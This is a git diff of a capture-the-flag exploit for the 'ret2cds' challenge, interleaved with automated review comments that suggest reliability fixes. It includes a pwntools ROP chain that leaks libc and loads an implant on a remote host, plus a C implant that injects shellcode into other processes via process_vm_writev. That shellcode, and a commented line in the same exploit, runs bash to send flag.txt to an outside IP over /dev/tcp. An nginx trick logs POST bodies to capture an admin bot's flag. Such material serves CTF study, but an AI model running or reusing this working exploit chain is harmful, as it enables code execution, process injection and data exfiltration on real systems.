"vmsplice", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "wait4", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "waitid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "waitpid", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "write", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "writev", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "arch_prctl", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "modify_ldt", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "chroot", + "action": "SCMP_ACT_ALLOW", + "args": [] + }, + { + "name": "clone", + "action": "SCMP_ACT_ALLOW", + "args": [ + { + "index": 0, + "value": 2080505856, + "valueTwo": 0, + "op": "SCMP_CMP_MASKED_EQ" + } + ] + } + ] +} 
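Review bot: in this allow list, `process_vm_readv` and `process_vm_writev` do not appear where they would sort (between `prlimit64` and `pselect6`), yet `stage2.c` in this same change relies on `process_vm_writev` (syscall 311) to write into the Java parent; if this profile is what the challenge container runs under, state how that call gets through (a capability-conditioned rule elsewhere, or a different profile on the deployment host) so the analysis file can be read on its own. Separately, the `clone` rule's `SCMP_CMP_MASKED_EQ` value 2080505856 is 0x7c020000, which masks CLONE_NEWNS, CLONE_NEWUTS, CLONE_NEWIPC, CLONE_NEWUSER, CLONE_NEWPID and CLONE_NEWNET but not CLONE_NEWCGROUP (0x02000000); current Docker default profiles use 2114060288 (0x7e020000) to cover cgroup namespaces as well.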
diff --git a/2021/corctf/ret2cds/challenge/server/nc-java.jar b/2021/corctf/ret2cds/challenge/server/nc-java.jar new file mode 100755 index 0000000..84073d7 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/server/nc-java.jar differ diff --git a/2021/corctf/ret2cds/challenge/server/slf4j-api-1.7.2.jar b/2021/corctf/ret2cds/challenge/server/slf4j-api-1.7.2.jar new file mode 100755 index 0000000..1a88708 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/server/slf4j-api-1.7.2.jar differ diff --git a/2021/corctf/ret2cds/challenge/server/zt-exec-1.12.jar b/2021/corctf/ret2cds/challenge/server/zt-exec-1.12.jar new file mode 100755 index 0000000..d8c6983 Binary files /dev/null and b/2021/corctf/ret2cds/challenge/server/zt-exec-1.12.jar differ diff --git a/2021/corctf/ret2cds/challenge/start.sh b/2021/corctf/ret2cds/challenge/start.sh new file mode 100644 index 0000000..2692cd8 --- /dev/null +++ b/2021/corctf/ret2cds/challenge/start.sh @@ -0,0 +1,3 @@ +#!/bin/sh +cd /home/ret2cds +while true; do java -jar /opt/nc-java/nc-java.jar ./ret2cds 1337; done \ No newline at end of file diff --git a/2021/corctf/ret2cds/exploit/Makefile b/2021/corctf/ret2cds/exploit/Makefile new file mode 100644 index 0000000..9841260 --- /dev/null +++ b/2021/corctf/ret2cds/exploit/Makefile @@ -0,0 +1,16 @@ +.PHONY: all clean copy + +CC=gcc +OBJCOPY=objcopy + +all: implant.bin + +clean: + $(RM) *.bin *.elf + +implant.bin: implant.elf + $(OBJCOPY) -O binary $< $@ + +implant.elf: stage2.c stage2.ld + $(CC) -nostdlib -nodefaultlibs -nostdinc -T stage2.ld -fpic -fno-stack-protector \ + -Os -std=gnu11 -Wall -Wextra -o $@ $< diff --git a/2021/corctf/ret2cds/exploit/exploit.py b/2021/corctf/ret2cds/exploit/exploit.py new file mode 100644 index 0000000..4ec0dfa --- /dev/null +++ b/2021/corctf/ret2cds/exploit/exploit.py 
@@ -0,0 +1,70 @@ +from pwn import * + +import os + +context.arch = 'amd64' + +def run(): + elf = ELF("../challenge/chall/ret2cds") + rop = ROP(elf) + rop.write(1, elf.got['write']) + print(rop.dump()) + + libc = ELF("../challenge/chall/libc.so.6") + print(hex(libc.symbols['write'])) + + # r = process(["./ld-2.31.so", "./ret2cds"], env={"LD_PRELOAD": os.getcwd() + "/libc.so.6"}) + # gdb.attach(r) + # r = remote("localhost", 1337) + r = remote("ret2cds.be.ax", 34485) + try: + r.recvuntil("warden: ") + + r.sendline(b"A"*256 + b"AAAAAAAA" + rop.chain() + p64(0x0040123a)) + print(r.recvline()) + print(r.recvline()) + leak = r.recvline()[1:8] + leak = u64(leak.ljust(8, b'\x00')) + print(hex(leak)) + + libc_base = leak - libc.symbols['write'] + print(hex(libc_base)) + + libc.address = libc_base + + libc_rop = ROP(libc) + libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32) #, -1, 0) + libc_rop.read(0, 0x133713370000, 0x10000) + print(libc_rop.dump()) + print(libc_rop.chain()) + + # abuse setcontext lol + # setcontext is always a good function to look for cool gadgets in + # loaded as 0x0 + # 001581e1 4c 8b 4a 30 MOV R9,qword ptr [RDX + 0x30] + # 001581e5 48 8b 92 MOV RDX,qword ptr [RDX + 0x88] + # 88 00 00 00 + # 001581ec 31 c0 XOR EAX,EAX + # 001581ee c3 RET + fucky_r9_gadget = p64(0x581e1 + libc_base) + # load rdx with a pointer to rodata (convenient source of 0x0s) offset so that r9 gets + pre_rop = ROP(libc) + pre_rop.rdx = 0x402008 - 0x30 + + r.sendline(b"A"*256 + b"AAAAAAAA" + pre_rop.chain() + fucky_r9_gadget + libc_rop.chain() + p64(0x133713370000)) + + os.system("make") + with open("implant.bin", "rb") as f: + shellcode = f.read() + shellcode += b"\x00" * (0x10000 - len(shellcode)) + + r.send(shellcode) + + # stage3 = asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {})) + + r.interactive() + finally: + r.close() + +if __name__ == "__main__": + run() 
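Review bot: the restart loop in `start.sh` (`while true; do java -jar /opt/nc-java/nc-java.jar ./ret2cds 1337; done`) has no delay, so a server that fails at startup (port already bound, missing jar) respawns in a tight loop; put a `sleep 1` in the loop body. The `cd /home/ret2cds` is also unguarded while the binary path handed to the jar is relative (`./ret2cds`), so make it `cd /home/ret2cds || exit 1`, and add the trailing newline the diff flags as missing.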
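Review bot: the build in `exploit/Makefile` compiles `stage2.c` with `-nostdlib -nostdinc -Os` but without `-ffreestanding`, so GCC may pattern-match the byte loops in the file's own `memset`/`memcpy` into calls to `memset`/`memcpy`, which in this link resolve to those very functions; add `-ffreestanding -fno-tree-loop-distribute-patterns` to the flags. Also `-fpic` does not make `implant.bin` position-independent: `stage2.ld` fixes `ORIGIN = 0x133713370000`, `exploit.py` hard-codes the same constant in `mmap`, `read` and the final return address, and `local_vec` in `stage2.c` stores an absolute pointer to `buf2`. Either drop `-fpic` or have `exploit.py` take the load address from the built ELF (`ELF("implant.elf").entry`, which is `_start` in `.text.start`, the first section) so the two sides cannot drift apart.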
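Review bot: the second stage in `exploit.py` fetches the implant with a single `libc_rop.read(0, 0x133713370000, 0x10000)` and then returns straight into `0x133713370000`; stdin is a socket here, so one `read` can return fewer than the 0x10000 bytes that `r.send(shellcode)` pushes, and a short read leaves the tail of the image (the `.rodata`/`.data` holding the shellcode string and the iovecs) as zero-filled memory while execution has already begun. Either loop the read in the chain until the full image has arrived, or have the implant's first instructions re-read the remainder before it touches its data. Two smaller points: the comment above `pre_rop.rdx = 0x402008 - 0x30` is cut off mid-sentence; it should say that the gadget loads r9 (the `offset` argument that `libc_rop.mmap(0x133713370000, 0x10000, 7, 0x32)` leaves unset) from `[rdx+0x30]`, i.e. from a zero in `.rodata`, because the kernel rejects a non-page-aligned offset with EINVAL even for `MAP_ANONYMOUS`, whereas the fd left in r8 is ignored for anonymous mappings. And `leak = r.recvline()[1:8]` breaks if any byte of the leaked `write` address happens to be 0x0a; read the eight bytes with `r.recvn(8)` after the known prefix instead of splitting on newline.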
diff --git a/2021/corctf/ret2cds/exploit/stage2.c b/2021/corctf/ret2cds/exploit/stage2.c new file mode 100644 index 0000000..abba84b --- /dev/null +++ b/2021/corctf/ret2cds/exploit/stage2.c 
@@ -0,0 +1,174 @@ +// look ma no stdlib +typedef unsigned char uint8_t; +_Static_assert(sizeof(uint8_t) == 1, "uint8_t wrong size"); +typedef unsigned short uint16_t; +_Static_assert(sizeof(uint16_t) == 2, "uint16_t wrong size"); +typedef unsigned int uint32_t; +_Static_assert(sizeof(uint32_t) == 4, "uint32_t wrong size"); +typedef unsigned long long uint64_t; +_Static_assert(sizeof(uint64_t) == 8, "uint64_t wrong size"); +typedef unsigned int size_t; +typedef int ssize_t; + +#define NULL ((void*)0x0) +#define pid_t unsigned long +#define true 1 +#define false 0 +#define SYS_exit 1 +#define SYS_read 0 +#define SYS_write 1 +#define SYS_process_vm_readv 310 +#define SYS_process_vm_writev 311 + +struct iovec { + void *iov_base; /* Starting address */ + size_t iov_len; /* Number of bytes to transfer */ +}; + +int main(); +void __attribute__((noreturn)) exit(int); + +void* memset(void* dst, int val, size_t size) { + for (size_t i = 0; i < size; i++) { + ((uint8_t*)dst)[i] = val; + } + return dst; +} + +void* memcpy(void* dst, const void* src, size_t size) { + for (size_t i = 0; i < size; i++) { + ((uint8_t*)dst)[i] = ((uint8_t*)src)[i]; + } + return dst; +} + +size_t strlen(const char* s) { + size_t sz = 0; + while(*s) { + s++; + sz++; + } + return sz; +} + +extern uint8_t _bss; +extern uint8_t _ebss; +void __attribute__((noreturn)) __attribute__((section(".text.start"))) _start() { + // wipe .bss + memset(&_bss, 0, (&_ebss) - (&_bss)); + // go to main! 
+ exit(main()); +} + +ssize_t read(int _fd, void* _buf, size_t _len) { + register int fd asm("rdi") = _fd; + register void* buf asm("rsi") = _buf; + register size_t len asm("rdx") = _len; + register int syscall asm("rax") = SYS_read; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory"); + return ret; +} + +void write(int _fd, const void* _buf, size_t _len) { + register int fd asm("rdi") = _fd; + register const void* buf asm("rsi") = _buf; + register size_t len asm("rdx") = _len; + register int syscall asm("rax") = SYS_write; + asm volatile("syscall" :: "r"(fd), "r"(buf), "r"(len), "r"(syscall) : "memory"); +} + +void __attribute__((noreturn)) exit(int _code) { + register int code asm("rdi") = _code; + register int syscall asm("rax") = SYS_exit; + asm volatile("syscall" :: "r"(code), "r"(syscall) : "memory"); + __builtin_unreachable(); +} + +ssize_t process_vm_readv(pid_t _pid, + const struct iovec *_local_iov, + unsigned long _liovcnt, + const struct iovec *_remote_iov, + unsigned long _riovcnt, + unsigned long _flags) { + register pid_t pid asm("rdi") = _pid; + register struct iovec* local_iov asm("rsi") = _local_iov; + register unsigned long liovcnt asm("rdx") = _liovcnt; + register struct iovec* remote_iov asm("r10") = _remote_iov; + register unsigned long riovcnt asm("r8") = _riovcnt; + register unsigned long flags asm("r9") = _flags; + register int syscall asm("rax") = SYS_process_vm_readv; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov), + "r"(riovcnt), "r"(flags), "r"(syscall) : "memory"); + return ret; +} + +ssize_t process_vm_writev(pid_t _pid, + const struct iovec *_local_iov, + unsigned long _liovcnt, + const struct iovec *_remote_iov, + unsigned long _riovcnt, + unsigned long _flags) { + register pid_t pid asm("rdi") = _pid; + register struct iovec* local_iov asm("rsi") = _local_iov; + register 
unsigned long liovcnt asm("rdx") = _liovcnt; + register struct iovec* remote_iov asm("r10") = _remote_iov; + register unsigned long riovcnt asm("r8") = _riovcnt; + register unsigned long flags asm("r9") = _flags; + register int syscall asm("rax") = SYS_process_vm_writev; + register ssize_t ret asm("rax"); + asm volatile("syscall" : "=r"(ret) : "r"(pid), "r"(local_iov), "r"(liovcnt), "r"(remote_iov), + "r"(riovcnt), "r"(flags), "r"(syscall) : "memory"); + return ret; +} + +//////////////////////////////////////////////////////////////////////////////////////////////////// + + +void print(char* s) { + write(1, s, strlen(s)); +} + +const char* hex_chars = "0123456789abcdef"; + +void print_int(unsigned long x) { + char c; + for(int i = 0; i < 64; i+= 4) { + c = hex_chars[(x >> (64 - 4 - i)) & 0xf]; + write(1, &c, 1); + } +} + +// asm(shellcraft.amd64.linux.execve("/bin/bash", ["/bin/bash", "-c", "touch /tmp/hax; cat flag.txt > /dev/tcp/44.44.127.10/1337"], {})) +char* buf = "\x6a\x68\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x48\x89\xe7\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x31\x2e\x30\x32\x32\x36\x01\x01\x48\x31\x04\x24\x48\xb8\x34\x34\x2e\x31\x32\x37\x2e\x31\x50\x48\xb8\x2f\x74\x63\x70\x2f\x34\x34\x2e\x50\x48\xb8\x74\x20\x3e\x20\x2f\x64\x65\x76\x50\x48\xb8\x20\x66\x6c\x61\x67\x2e\x74\x78\x50\x48\xb8\x68\x61\x78\x3b\x20\x63\x61\x74\x50\x48\xb8\x63\x68\x20\x2f\x74\x6d\x70\x2f\x50\x48\xb8\x01\x01\x01\x01\x01\x01\x01\x01\x50\x48\xb8\x69\x01\x2c\x62\x01\x75\x6e\x74\x48\x31\x04\x24\x48\xb8\x2f\x62\x69\x6e\x2f\x62\x61\x73\x50\x31\xf6\x56\x6a\x15\x5e\x48\x01\xe6\x56\x6a\x1a\x5e\x48\x01\xe6\x56\x6a\x18\x5e\x48\x01\xe6\x56\x48\x89\xe6\x6a\x01\xfe\x0c\x24\x31\xd2\x52\x48\x89\xe2\x6a\x3b\x58\x0f\x05"; +char buf2[0x2000]; + +struct iovec remote_vec = { (void*)0x800000000, 0x2000 }; +struct iovec local_vec = { &buf2[0], 0x2000 }; + +int main() { + print("implant is booted\n"); + + memset(buf2, 0x90, 0x2000); + memcpy(&buf2[0x2000 - 186], buf, 186); + + for (int i = 
2; i < 100; i++) { + print("sending to pid:"); + print_int(i); + print("\n"); + ssize_t ret = process_vm_writev(i, &local_vec, 1, &remote_vec, 1, 0); + if (ret <= 0) { + print("bad ret!: "); + print_int(-ret); + print("\n"); + } else { + print("GOOD RET\n"); + break; + } + } + print("injection complete\n"); + while(true){} + return 120; +} + diff --git a/2021/corctf/ret2cds/exploit/stage2.ld b/2021/corctf/ret2cds/exploit/stage2.ld new file mode 100644 index 0000000..d7334d8 --- /dev/null +++ b/2021/corctf/ret2cds/exploit/stage2.ld @@ -0,0 +1,33 @@ +ENTRY(_start) + +MEMORY +{ + RAM (rwx) : ORIGIN = 0x133713370000, LENGTH = 0x10000 +} + +SECTIONS +{ + .text : + { + *(.text.start) + *(.text*) + } + + .rodata : + { + *(.rodata*) + } + + .data : + { + *(.data*) + } + + .bss : + { + _bss = .; + *(.bss*) + *(COMMON) + _ebss = .; + } +} diff --git a/2021/corctf/ret2cds/main.png b/2021/corctf/ret2cds/main.png new file mode 100644 index 0000000..bfc38b6 Binary files /dev/null and b/2021/corctf/ret2cds/main.png differ diff --git a/2021/corctf/tricks.md b/2021/corctf/tricks.md new file mode 100644 index 0000000..b2c2a17 --- /dev/null +++ b/2021/corctf/tricks.md @@ -0,0 +1,22 @@ +# tricks + +## phpme: log all submitted post data with nginx +(to capture a flag POSTed by an adminbot) + +you can avoid having to write any code and use pure nginx config for this lol + +i'm putting this here because i don't wanna write up phpme but this is a cool thing i found out in +the process + +```nginx +log_format postdata $request_body; + +server { + location /flagzone { + access_log /var/log/nginx/flags.log postdata; + echo_read_request_body; + # ... + } + # ... +} +```
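Review bot: `#define SYS_exit 1` in `stage2.c` is the x86-64 number for `write` (the same value as `SYS_write` just below); `exit` is 60, so `exit()` as written issues a `write` with the exit code as the fd and then runs into `__builtin_unreachable()`. It is only latent because `main` never returns (`while(true){}`), but fix the constant and the spin loop can go. The inline `syscall` wrappers also omit `"rcx"` and `"r11"` from their clobber lists even though the kernel overwrites both registers on every `syscall`, so the compiler may keep a live value in either across the call; add them. Finally `typedef unsigned int size_t; typedef int ssize_t;` makes `iov_len` 4 bytes, whereas the kernel's `struct iovec` expects an 8-byte length; `remote_vec`/`local_vec` work only because they are static objects whose padding is zero-filled, and `ret` truncates the 64-bit return value. Use `unsigned long`/`long` as on every LP64 target, and replace the hard-coded `186` in `memcpy(&buf2[0x2000 - 186], buf, 186)` with `sizeof` of an array-typed `buf`.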
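Review bot: `stage2.ld` has no `/DISCARD/` rule, so any allocatable orphan section the toolchain emits for `stage2.c` (`.eh_frame`, a `.note.gnu.build-id` if the linker adds one) is placed by ld's orphan heuristics and copied into `implant.bin` by `objcopy -O binary`; add `/DISCARD/ : { *(.note*) *(.eh_frame*) *(.comment) }` (or `-fno-asynchronous-unwind-tables` and `-Wl,--build-id=none` in the Makefile) so the flat image holds exactly `.text`, `.rodata` and `.data`. A comment is also due on `.bss`: it occupies no bytes in `implant.bin`, so `buf2`'s 0x2000 bytes exist in the target only because `exploit.py` pads the image with zeros to the full 0x10000 mapping and `_start` wipes `_bss`..`_ebss`; the `LENGTH = 0x10000` region is what guarantees `_ebss` stays inside that mapping.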
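Review bot: the nginx snippet in `tricks.md` depends on `echo_read_request_body`, which comes from the third-party `echo` module (ngx_echo from the OpenResty project), not stock nginx; without it the config test fails with an unknown-directive error, and the page should say so. Also `$request_body` is only populated when the body was read into memory: if it exceeds `client_body_buffer_size` nginx spills it to a temp file and the variable logs empty, so raise `client_body_buffer_size` in that location (or log `$request_body_file` as a fallback) if the posted flag can be large.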